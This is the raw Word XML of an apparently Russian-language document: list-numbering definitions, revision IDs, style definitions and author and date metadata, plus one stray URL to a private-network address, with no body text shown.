    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACEA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B4D43"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91D65382"/>
    <w:lvl w:ilvl="0" w:tplc="AE72E3C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CCF2FBA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51A2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207A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41D4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42408"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F2A3E4E"/>
    <w:lvl w:ilvl="0" w:tplc="EB5237F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35B05492"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36721F7E"/>
    <w:lvl w:ilvl="0" w:tplc="4DA89B0C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8D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9234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94523"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3CE6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56034F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2850DB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AB541D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="592EB152"/>
    <w:lvl w:ilvl="0" w:tplc="0B32FC2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E491698"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE4C4E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C97C54"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F682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40D7C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75A00688"/>
    <w:lvl w:ilvl="0" w:tplc="839C6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2E489D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA54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0C26"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="013A4528"/>
    <w:lvl w:ilvl="0" w:tplc="8932BD9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65694B44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="347E0CE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6D2146D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9CF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45B39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C834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2F4430"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29EE1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CB438B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CFC667D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1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F47083D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76B22C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15"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="42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0"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="2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11EFA"/>
    <w:rsid w:val="00014F39"/>
    <w:rsid w:val="00030B95"/>
    <w:rsid w:val="00032E8C"/>
    <w:rsid w:val="00047B77"/>
    <w:rsid w:val="00054C83"/>
    <w:rsid w:val="000668C9"/>
    <w:rsid w:val="0008208F"/>
    <w:rsid w:val="00092751"/>
    <w:rsid w:val="000A0158"/>
    <w:rsid w:val="000F0663"/>
    <w:rsid w:val="000F6D32"/>
    <w:rsid w:val="001142D2"/>
    <w:rsid w:val="001144D4"/>
    <w:rsid w:val="00136B9C"/>
    <w:rsid w:val="001503FF"/>
    <w:rsid w:val="00150BEA"/>
    <w:rsid w:val="00154C49"/>
    <w:rsid w:val="00155AB2"/>
    <w:rsid w:val="00161BE5"/>
    <w:rsid w:val="00174A27"/>
    <w:rsid w:val="00174CB3"/>
    <w:rsid w:val="00177DC4"/>
    <w:rsid w:val="00181CB0"/>
    <w:rsid w:val="0019194C"/>
    <w:rsid w:val="00196886"/>
    <w:rsid w:val="001A29DA"/>
    <w:rsid w:val="001B5AD1"/>
    <w:rsid w:val="001D2B90"/>
    <w:rsid w:val="001E23B3"/>
    <w:rsid w:val="001F172A"/>
    <w:rsid w:val="001F625F"/>
    <w:rsid w:val="002171FF"/>
    <w:rsid w:val="002316FE"/>
    <w:rsid w:val="00232079"/>
    <w:rsid w:val="002344D0"/>
    <w:rsid w:val="00236573"/>
    <w:rsid w:val="00236B7A"/>
    <w:rsid w:val="00245957"/>
    <w:rsid w:val="002727C5"/>
    <w:rsid w:val="00273991"/>
    <w:rsid w:val="002741BF"/>
    <w:rsid w:val="0027695D"/>
    <w:rsid w:val="002843EA"/>
    <w:rsid w:val="002A2820"/>
    <w:rsid w:val="002A42EA"/>
    <w:rsid w:val="002A4F60"/>
    <w:rsid w:val="002C2C66"/>
    <w:rsid w:val="002C6B1E"/>
    <w:rsid w:val="002E7052"/>
    <w:rsid w:val="002F1617"/>
    <w:rsid w:val="002F5CBB"/>
    <w:rsid w:val="003423DE"/>
    <w:rsid w:val="00353772"/>
    <w:rsid w:val="00362607"/>
    <w:rsid w:val="003757BC"/>
    <w:rsid w:val="00380990"/>
    <w:rsid w:val="00387207"/>
    <w:rsid w:val="003A41BB"/>
    <w:rsid w:val="003A5C56"/>
    <w:rsid w:val="003A732E"/>
    <w:rsid w:val="003E1017"/>
    <w:rsid w:val="003F17B0"/>
    <w:rsid w:val="003F3727"/>
    <w:rsid w:val="00400153"/>
    <w:rsid w:val="00407769"/>
    <w:rsid w:val="00411A29"/>
    <w:rsid w:val="00412D8A"/>
    <w:rsid w:val="00414FA0"/>
    <w:rsid w:val="004173CE"/>
    <w:rsid w:val="00430931"/>
    <w:rsid w:val="00433315"/>
    <w:rsid w:val="004335E0"/>
    <w:rsid w:val="00434B48"/>
    <w:rsid w:val="00441E20"/>
    <w:rsid w:val="00443320"/>
    <w:rsid w:val="00443C0C"/>
    <w:rsid w:val="00462C87"/>
    <w:rsid w:val="0046398A"/>
    <w:rsid w:val="00464CF3"/>
    <w:rsid w:val="00474FA6"/>
    <w:rsid w:val="00475AAE"/>
    <w:rsid w:val="004800F7"/>
    <w:rsid w:val="004A152A"/>
    <w:rsid w:val="004C51AA"/>
    <w:rsid w:val="004D5D89"/>
    <w:rsid w:val="004E05AE"/>
    <w:rsid w:val="004E5CE4"/>
    <w:rsid w:val="004F1A20"/>
    <w:rsid w:val="005058B8"/>
    <w:rsid w:val="00510556"/>
    <w:rsid w:val="00523B4A"/>
    <w:rsid w:val="005311D6"/>
    <w:rsid w:val="00533BAB"/>
    <w:rsid w:val="005420B6"/>
    <w:rsid w:val="0054490C"/>
    <w:rsid w:val="005505B5"/>
    <w:rsid w:val="00551CC9"/>
    <w:rsid w:val="00567617"/>
    <w:rsid w:val="00577248"/>
    <w:rsid w:val="005949A9"/>
    <w:rsid w:val="005A65C2"/>
    <w:rsid w:val="005B0611"/>
    <w:rsid w:val="005B50A4"/>
    <w:rsid w:val="005B5448"/>
    <w:rsid w:val="005B5695"/>
    <w:rsid w:val="005C51C8"/>
    <w:rsid w:val="005D15E8"/>
    <w:rsid w:val="005D7E7C"/>
    <w:rsid w:val="005E2E8D"/>
    <w:rsid w:val="005F6A12"/>
    <w:rsid w:val="0061023F"/>
    <w:rsid w:val="00627BA0"/>
    <w:rsid w:val="00630387"/>
    <w:rsid w:val="00630663"/>
    <w:rsid w:val="00633AC0"/>
    <w:rsid w:val="00635F13"/>
    <w:rsid w:val="00651C77"/>
    <w:rsid w:val="00685CEF"/>
    <w:rsid w:val="00685D44"/>
    <w:rsid w:val="0069639D"/>
    <w:rsid w:val="006A2B6C"/>
    <w:rsid w:val="006B48A5"/>
    <w:rsid w:val="006B6F70"/>
    <w:rsid w:val="006D57BC"/>
    <w:rsid w:val="006E6A23"/>
    <w:rsid w:val="006F34A6"/>
    <w:rsid w:val="007050DF"/>
    <w:rsid w:val="007333C7"/>
    <w:rsid w:val="00745F66"/>
    <w:rsid w:val="007500CF"/>
    <w:rsid w:val="00754227"/>
    <w:rsid w:val="00757286"/>
    <w:rsid w:val="007839AC"/>
    <w:rsid w:val="0079074B"/>
    <w:rsid w:val="00794169"/>
    <w:rsid w:val="007A0B3E"/>
    <w:rsid w:val="007A512C"/>
    <w:rsid w:val="007A5BBA"/>
    <w:rsid w:val="007B1036"/>
    <w:rsid w:val="007B3860"/>
    <w:rsid w:val="007E42A3"/>
    <w:rsid w:val="007F23A3"/>
    <w:rsid w:val="00813F2C"/>
    <w:rsid w:val="008173A6"/>
    <w:rsid w:val="0082585D"/>
    <w:rsid w:val="00827C40"/>
    <w:rsid w:val="00846A8F"/>
    <w:rsid w:val="00854D15"/>
    <w:rsid w:val="008604F9"/>
    <w:rsid w:val="00866DE5"/>
    <w:rsid w:val="008757F2"/>
    <w:rsid w:val="00882862"/>
    <w:rsid w:val="0088684A"/>
    <w:rsid w:val="00895EA4"/>
    <w:rsid w:val="008A0C1E"/>
    <w:rsid w:val="008A29C0"/>
    <w:rsid w:val="008A391A"/>
    <w:rsid w:val="008B66DD"/>
    <w:rsid w:val="008C242E"/>
    <w:rsid w:val="008C3D64"/>
    <w:rsid w:val="008D06B4"/>
    <w:rsid w:val="008E2E5D"/>
    <w:rsid w:val="008E6422"/>
    <w:rsid w:val="008F6967"/>
    <w:rsid w:val="00902AF9"/>
    <w:rsid w:val="009148C8"/>
    <w:rsid w:val="009207F6"/>
    <w:rsid w:val="0092125A"/>
    <w:rsid w:val="00922374"/>
    <w:rsid w:val="00927DFF"/>
    <w:rsid w:val="00932A10"/>
    <w:rsid w:val="0093764D"/>
    <w:rsid w:val="00943410"/>
    <w:rsid w:val="00946271"/>
    <w:rsid w:val="00966AEF"/>
    <w:rsid w:val="009732DD"/>
    <w:rsid w:val="009760AE"/>
    <w:rsid w:val="00980670"/>
    <w:rsid w:val="00981C63"/>
    <w:rsid w:val="009833EB"/>
    <w:rsid w:val="009D0998"/>
    <w:rsid w:val="009E50C1"/>
    <w:rsid w:val="009F50A6"/>
    <w:rsid w:val="009F763B"/>
    <w:rsid w:val="009F7F63"/>
    <w:rsid w:val="00A12408"/>
    <w:rsid w:val="00A130B9"/>
    <w:rsid w:val="00A33D0E"/>
    <w:rsid w:val="00A5414B"/>
    <w:rsid w:val="00A612D1"/>
    <w:rsid w:val="00A626FB"/>
    <w:rsid w:val="00A63663"/>
    <w:rsid w:val="00A805F6"/>
    <w:rsid w:val="00A85FD7"/>
    <w:rsid w:val="00A91790"/>
    <w:rsid w:val="00A949B5"/>
    <w:rsid w:val="00A950B8"/>
    <w:rsid w:val="00AA180F"/>
    <w:rsid w:val="00AA49BB"/>
    <w:rsid w:val="00AB4B7E"/>
    <w:rsid w:val="00AB79BA"/>
    <w:rsid w:val="00AC4FB4"/>
    <w:rsid w:val="00AF09A2"/>
    <w:rsid w:val="00AF0A65"/>
    <w:rsid w:val="00AF21F3"/>
    <w:rsid w:val="00AF58DA"/>
    <w:rsid w:val="00B01D9D"/>
    <w:rsid w:val="00B13870"/>
    <w:rsid w:val="00B2588E"/>
    <w:rsid w:val="00B30985"/>
    <w:rsid w:val="00B37F43"/>
    <w:rsid w:val="00B46583"/>
    <w:rsid w:val="00B64999"/>
    <w:rsid w:val="00BA1C2B"/>
    <w:rsid w:val="00BA339D"/>
    <w:rsid w:val="00BC41D6"/>
    <w:rsid w:val="00BC4B1F"/>
    <w:rsid w:val="00BC6730"/>
    <w:rsid w:val="00BC7811"/>
    <w:rsid w:val="00BF108D"/>
    <w:rsid w:val="00C038BC"/>
    <w:rsid w:val="00C13599"/>
    <w:rsid w:val="00C430FF"/>
    <w:rsid w:val="00C473FD"/>
    <w:rsid w:val="00C5470F"/>
    <w:rsid w:val="00C714DF"/>
    <w:rsid w:val="00C803C1"/>
    <w:rsid w:val="00C914E7"/>
    <w:rsid w:val="00C93367"/>
    <w:rsid w:val="00C949F8"/>
    <w:rsid w:val="00CA5DB5"/>
    <w:rsid w:val="00CB193A"/>
    <w:rsid w:val="00CB3953"/>
    <w:rsid w:val="00CC1C48"/>
    <w:rsid w:val="00CD10EA"/>
    <w:rsid w:val="00CE1ACD"/>
    <w:rsid w:val="00CE7D3E"/>
    <w:rsid w:val="00D00447"/>
    <w:rsid w:val="00D17373"/>
    <w:rsid w:val="00D25505"/>
    <w:rsid w:val="00D25709"/>
    <w:rsid w:val="00D27E6D"/>
    <w:rsid w:val="00D47121"/>
    <w:rsid w:val="00D533DB"/>
    <w:rsid w:val="00D81130"/>
    <w:rsid w:val="00D92B0D"/>
    <w:rsid w:val="00DB036C"/>
    <w:rsid w:val="00DB20AC"/>
    <w:rsid w:val="00DB2640"/>
    <w:rsid w:val="00DC3160"/>
    <w:rsid w:val="00DD3E71"/>
    <w:rsid w:val="00E01913"/>
    <w:rsid w:val="00E14598"/>
    <w:rsid w:val="00E1623D"/>
    <w:rsid w:val="00E168F7"/>
    <w:rsid w:val="00E20210"/>
    <w:rsid w:val="00E21EFB"/>
    <w:rsid w:val="00E47B73"/>
    <w:rsid w:val="00E61241"/>
    <w:rsid w:val="00E75789"/>
    <w:rsid w:val="00E91DAE"/>
    <w:rsid w:val="00EA13FA"/>
    <w:rsid w:val="00EA772D"/>
    <w:rsid w:val="00EC0AD5"/>
    <w:rsid w:val="00EC110E"/>
    <w:rsid w:val="00EC45BF"/>
    <w:rsid w:val="00ED4FDF"/>
    <w:rsid w:val="00ED6C98"/>
    <w:rsid w:val="00EE2DA8"/>
    <w:rsid w:val="00EE45B3"/>
    <w:rsid w:val="00EE46E3"/>
    <w:rsid w:val="00EF0C75"/>
    <w:rsid w:val="00EF2F39"/>
    <w:rsid w:val="00F0288B"/>
    <w:rsid w:val="00F05742"/>
    <w:rsid w:val="00F058EB"/>
    <w:rsid w:val="00F16256"/>
    <w:rsid w:val="00F32C55"/>
    <w:rsid w:val="00F4451B"/>
    <w:rsid w:val="00F943A5"/>
    <w:rsid w:val="00FA16FA"/>
    <w:rsid w:val="00FA5F22"/>
    <w:rsid w:val="00FB3FF3"/>
    <w:rsid w:val="00FB6DB0"/>
    <w:rsid w:val="00FC2FE2"/>
    <w:rsid w:val="00FE1CCF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254B3"/>
  <w15:docId w15:val="{5040AD7B-0231-470E-A60F-BF9DF38B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1EFA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Calibri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EFA"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:color w:val="365F91"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="007A0B3E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uiPriority w:val="99"/>
    <w:rsid w:val="001D2B9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D2B90"/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00827C40"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="Заголовок Знак"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00827C40"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi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rsid w:val="0094627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46271"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Times New Roman"/>
      <w:sz w:val="16"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="Стиль1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="12"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00EE45B3"/>
    <w:pPr>
      <w:ind w:firstLine="567"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00EE45B3"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="Стиль1 Знак"/>
    <w:link w:val="11"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00EE45B3"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ab"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00EE45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locked/>
    <w:rsid w:val="00EE45B3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EE45B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EE45B3"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00474FA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99"/>
    <w:rsid w:val="00474FA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474FA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D1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D15E8"/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577248"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="im-mess">
    <w:name w:val="im-mess"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="004D5D89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4E5CE4"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af0">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00AA49BB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54C83"/>
    <w:rPr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45F66"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-">
    <w:name w:val="Таблица - Название"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="009760AE"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="boxtitle">
    <w:name w:val="boxtitle"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009760AE"/>
  </w:style>
  <w:style w:type="character" w:styleId="af2">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0027695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7695D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7B1036"/>
  </w:style>
  <w:style w:type="character" w:styleId="af3">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C949F8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DB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9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3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6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10.10.10.223/sator.php.ba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FAD2-D598-44AF-9DC8-8FA3725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Джумабаев Артур Булатович</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2016-06-06T03:03:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-22T02:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-22T06:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>